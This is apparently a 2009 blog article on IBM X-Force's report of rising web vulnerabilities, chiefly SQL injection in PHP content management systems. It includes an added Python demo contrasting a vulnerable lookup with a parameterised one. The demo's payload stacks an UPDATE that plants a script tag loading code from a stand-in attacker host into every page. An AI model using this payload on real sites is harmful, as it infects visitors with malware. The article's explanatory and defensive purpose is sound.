Security: IBM Finds PHP Web Content Management Systems Vulnerable

In its biannual report released Feb. 2, 2009, IBM's X-Force research group pointed out significant security threat trends as we enter 2009, and paid particular attention to vulnerabilities found in PHP web content management systems such as Joomla!, Drupal, TYPO3 and WordPress.

The report is pretty. It has over a hundred pages. It has lots of nifty charts and graphs. But let's take a closer look at what the net impact is.

Damn FUD, but It's Getting Worse

We hate Threat Level Orange, neo-fascist, scare-tactic-type messages as much as the next person, but facts are worth knowing. Vulnerabilities are getting more numerous. We are getting less safe on the Internets. There, we said it.

According to a recent article, 70 Percent of Top Sites Distribute or Link to Malware. According to the IBM report, 2008 was the first year where they saw more than 7,000 vulnerabilities reported, a 13.5% increase over 2007. In the 10 years of tracking this business, fully 19% of all vulnerabilities were reported in 2008. 

Now, let's clarify what they are tracking. A vulnerability — in IBM's eyes — is "any computer-related vulnerability, exposure, or configuration setting that may result in a weakening or breakdown of the confidentiality, integrity, or accessibility of the computing system".

Threat severities were classified using the Common Vulnerability Scoring System (CVSS), an industry standard for rating vulnerabilities (see First.org for details).

SQL Injection a Huge Problem

In our popular article, How They Hack Your Website: Overview of Common Techniques, we talked a fair bit about SQL injection threats, what they are and how they are commonly executed.

IBM's research team highlights the ongoing threat of SQL injection attacks, stating that 54.9% of disclosed vulnerabilities were found in web applications and that attackers continue to target web app vulnerabilities, especially via SQL injection, often to plant malware on unsuspecting website users.

The two leading categories of web application vulnerabilities were cross-site scripting (XSS) and SQL injection. In 2008 it was SQL injection that displaced XSS as the leading type of issue: SQL injection weaknesses were up an impressive 134% over the issues reported in 2007.

The report asserts that XSS vulnerabilities are less valuable to the attacker and perhaps therefore less dangerous than SQL injection.

Although cross-site scripting issues are also easy to discover, they are not as valuable to an attacker. They usually result in cookie theft, which provides the attacker with access to a victim’s account on the vulnerable Website. SQL injection, on the other hand, is often used to redirect the visitors from the vulnerable Website to the attacker’s Website where remote code execution exploits can be launched against the victim’s browser.
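The mechanism the report is describing, shown as an added example that is not from the page or from any of the CMS projects it names: a page-lookup handler that pastes a request parameter straight into SQL, run through a database interface that accepts stacked statements, beside the same lookup written as a parameterised query. The pages table, the sample content, the attacker host (attacker.example) and the payload are all constructed for this demonstration; Python's sqlite3 module stands in for the PHP/MySQL stack (SQLite's || operator is used for string concatenation), and the parameterised version corresponds to PDO prepared statements with placeholders in a PHP CMS.

```python
import sqlite3

# Constructed sample content standing in for a CMS "pages" table; not
# taken from any real product.
SAMPLE_PAGES = [
    ("home", "Welcome", "<p>Hello, world</p>"),
    ("about", "About us", "<p>We sell widgets.</p>"),
]

# Hypothetical attacker-controlled script location (assumption for the demo).
MALWARE_SRC = "http://attacker.example/m.js"
SCRIPT_TAG = f'<script src="{MALWARE_SRC}"></script>'

# Injection payload in the style of the 2008 mass-injection campaigns: close
# the quoted slug, end the SELECT, then stack an UPDATE that appends a script
# tag to every stored page body. The trailing WHERE 'x'='x absorbs the closing
# quote from the original query, so no comment marker is needed.
PAYLOAD = f"x'; UPDATE pages SET body = body || '{SCRIPT_TAG}' WHERE 'x'='x"


def fresh_db():
    """In-memory SQLite database loaded with the sample pages."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (slug TEXT PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)", SAMPLE_PAGES)
    conn.commit()
    return conn


def run_stacked(conn, sql):
    """Stand-in for a database API that accepts several ';'-separated
    statements in one call (as mysqli_multi_query() or MSSQL drivers do):
    every statement is executed and the first statement's rows are returned.
    Python's sqlite3 only runs multi-statement text via executescript(), which
    discards result sets, so the first statement is re-run to fetch its rows."""
    conn.executescript(sql)
    first = sql.split(";", 1)[0]
    return conn.execute(first).fetchall()


def vulnerable_lookup(conn, slug):
    """The bug: the request parameter becomes part of the SQL text."""
    sql = f"SELECT title, body FROM pages WHERE slug = '{slug}'"
    return run_stacked(conn, sql)


def safe_lookup(conn, slug):
    """The fix: a parameterised query. The slug is bound as data, so the
    payload is merely a slug that matches no page and nothing else runs."""
    return conn.execute(
        "SELECT title, body FROM pages WHERE slug = ?", (slug,)
    ).fetchall()


def infected_count(conn):
    """How many stored pages now carry the attacker's script tag, i.e. how
    many pages would redirect their visitors to the attacker's host."""
    row = conn.execute(
        "SELECT count(*) FROM pages WHERE instr(body, ?) > 0", (MALWARE_SRC,)
    ).fetchone()
    return row[0]


if __name__ == "__main__":
    db = fresh_db()
    vulnerable_lookup(db, PAYLOAD)
    print("vulnerable handler, pages carrying the script tag:", infected_count(db))

    db = fresh_db()
    safe_lookup(db, PAYLOAD)
    print("parameterised handler, pages carrying the script tag:", infected_count(db))
```

Running the vulnerable handler once with the payload leaves every page body ending in the attacker's script tag, which is exactly the redirect-to-malware outcome the report attributes to SQL injection; the parameterised handler given the identical input returns no rows and changes nothing. Note that the stacked-statement step is what makes this particular payload work: a driver that refuses multiple statements per call (the legacy mysql_query() in PHP, for instance) blocks this variant but not injection in general, so the parameterised query, not the driver, is the fix.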

Who's Dirty? Most Used = Most Vulnerable

The report cites vulnerabilities disclosed during the year, which means the projects' leaders were aware of them and disclosed them. The chart of vendors shows Microsoft taking the top spot, followed by Apple, Sun and the Joomla project. What stands out here is the correlation between sheer volume of use and the number of vulnerabilities disclosed.

That's not an earth-shattering observation, but it does bear keeping in mind. It is also useful as a perspective, as we note that a project like Joomla has out-paced IBM, Oracle and Mozilla in the number of vulnerabilities disclosed.
